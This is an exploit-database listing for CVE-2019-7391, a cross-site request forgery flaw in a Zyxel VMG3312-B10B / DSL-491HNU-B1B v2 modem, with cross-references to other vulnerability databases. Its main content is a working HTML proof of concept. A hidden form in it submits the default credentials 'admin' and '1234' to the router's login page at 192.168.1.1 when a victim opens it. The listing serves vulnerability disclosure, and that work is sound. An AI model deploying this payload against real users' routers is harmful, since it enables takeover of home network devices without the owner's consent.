Zyxel VMG3312-B10B DSL-491HNU-B1 V2 Cross Site Request Forgery

🗓️ 06 Feb 2019 00:00:00Reported by Yusuf FurkanType

packetstorm🔗 packetstormsecurity.com👁 63 Views

Zyxel VMG3312-B10B DSL-491HNU-B1B v2 CSRF Exploi

Reporter	Title	Published	Views	Family All 8
0day.today	Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery Vulnerability	5 Feb 201900:00	–	zdt
CVE	CVE-2019-7391	17 Mar 201919:33	–	cve
Cvelist	CVE-2019-7391	17 Mar 201919:33	–	cvelist
Exploit DB	Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery	5 Feb 201900:00	–	exploitdb
EUVD	EUVD-2019-16933	7 Oct 202500:30	–	euvd
exploitpack	Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery	5 Feb 201900:00	–	exploitpack
NVD	CVE-2019-7391	21 Mar 201916:01	–	nvd
Prion	Cross site request forgery (csrf)	21 Mar 201916:01	–	prion

`# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit  
# Version: Zyxel VMG3312-B10B  
# Tested on : Parrot Os  
# Author: Yusuf Furkan  
# Twitter: h1_yusuf  
# CVE: CVE-2019-7391  
# model name: DSL-491HNU-B1B v2  
  
<html>  
<!-- CSRF PoC - generated by Yusuf -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.1.1/login/login-page.cgi" method="POST">  
<input type="hidden" name="AuthName" value="admin" />  
<input type="hidden" name="AuthPassword" value="1234" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

06 Feb 2019 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.00606